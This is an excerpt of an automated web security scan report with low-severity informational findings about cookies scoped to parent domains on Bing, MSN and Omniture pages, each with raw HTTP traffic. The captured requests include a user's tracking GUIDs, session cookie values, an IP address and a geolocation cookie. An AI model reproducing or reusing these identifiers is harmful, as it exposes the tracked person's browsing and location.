Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:35:44 GMT
Connection: close
Set-Cookie: _SS=SID=BADDC820B268422C99FA89F5582D20C7; domain=.bing.com; path=/

<iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dBADDC820B268422C99FA89F5582D20C7%3b&h=36aef2a7-994a-6863-3092-2a28e086b0e4" height="0" width="0" frameborder="0"/>

13.89. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?FORM=MSMONY&mkt=en-US HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89; _HOP=I=1&TS=1303843122

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US&FORM=MSMONY
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:38:43 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _HOP=I=2&TS=1303843123; domain=.bing.com; path=/
Content-Length: 164

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3fscope%3dweb%26mkt%3den-US%26FORM%3dMSMONY">here</a>.</h2>
</body></html>

13.90. http://www.bing.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/?FORM=MSMONY&mkt=en-US HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search?FORM=MSMONY&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 18:38:42 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1303843122; domain=.bing.com; path=/


13.91. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.msn.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:35:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA35
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=40II8A39_0214:WP10_5|; domain=www.msn.com; expires=Fri, 29-Apr-2011 18:35:24 GMT; path=/
Set-Cookie: expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; domain=msn.com; expires=Tue, 10-May-2011 18:35:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 83624
Content-Length: 83624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...

13.92. http://www.omniture.com/en/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/contact

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271502|check#true#1303852368|session#1303852218540-851916#1303854162; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:29:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Tue, 26 Apr 2011 21:29:28 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:29:28 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:29:28 GMT; path=/; domain=omniture.com
Content-Length: 23337


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Contact Omniture | Web Analytic
...[SNIP]...

13.93. http://www.omniture.com/en/products/conversion/testandtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/conversion/testandtarget

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/products/conversion/testandtarget HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; cms_site_lang=1; s_iid=1327; mbox=PC#1303601743323-887111.17#1306068395|session#1303649073183-321692#1303651055|check#true#1303649261

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 20:57:55 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 20:57:55 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 20:57:56 GMT
Connection: close
Set-Cookie: omniture_unique=2d1fce6a4fae5ab329674d745dd9d9a3; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 20:57:55 GMT; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/
Content-Length: 36497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Website Optimization & Tracking
...[SNIP]...

13.94. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/closed_loop_marketing

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/closed_loop_marketing HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; s_cc=true; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271437|check#true#1303852297|session#1303852218540-851916#1303854097

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:12 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:12 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:12 GMT; path=/; domain=omniture.com
Content-Length: 25751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Closed Loop Marketing<
...[SNIP]...

13.95. http://www.omniture.com/en/products/marketing_integration/genesis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_iid=30199; s_osc=30199; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271435|check#true#1303852295|session#1303852218540-851916#1303854095

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:42 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:42 GMT; path=/; domain=omniture.com
Content-Length: 26117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Email Marketing Software | Sale
...[SNIP]...

13.96. http://www.omniture.com/en/products/marketing_integration/genesis/applications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271426|check#true#1303852295|session#1303852218540-851916#1303854086; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:17:53 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:17:53 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:17:53 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:17:53 GMT; path=/; domain=omniture.com
Content-Length: 32151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

13.97. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/444  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications/15/444

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications/15/444 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271496|check#true#1303852360|session#1303852218540-851916#1303854156; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:19:02 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:19:02 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:19:02 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:19:02 GMT; path=/; domain=omniture.com
Content-Length: 28521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

13.98. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/574  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications/15/574

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications/15/574 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; s_cc=true; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271496|check#true#1303852356|session#1303852218540-851916#1303854156

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:46 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:46 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:46 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:46 GMT; path=/; domain=omniture.com
Content-Length: 28831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

13.99. http://www.omniture.com/en/products/marketing_integration/genesis/applications/39/543  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/marketing_integration/genesis/applications/39/543

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications/39/543 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271462|check#true#1303852326|session#1303852218540-851916#1303854122; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:44 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:44 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:44 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:44 GMT; path=/; domain=omniture.com
Content-Length: 25810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

13.100. http://www.omniture.com/en/products/multichannel_analytics/insight  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/multichannel_analytics/insight

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/multichannel_analytics/insight HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_iid=30199; s_osc=30199; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271431|check#true#1303852291|session#1303852218540-851916#1303854091

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:36 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:36 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:36 GMT; path=/; domain=omniture.com
Content-Length: 31371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Insight | Channel Ma
...[SNIP]...

13.101. http://www.omniture.com/en/products/multichannel_analytics/insight_retail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/multichannel_analytics/insight_retail

Issue detail

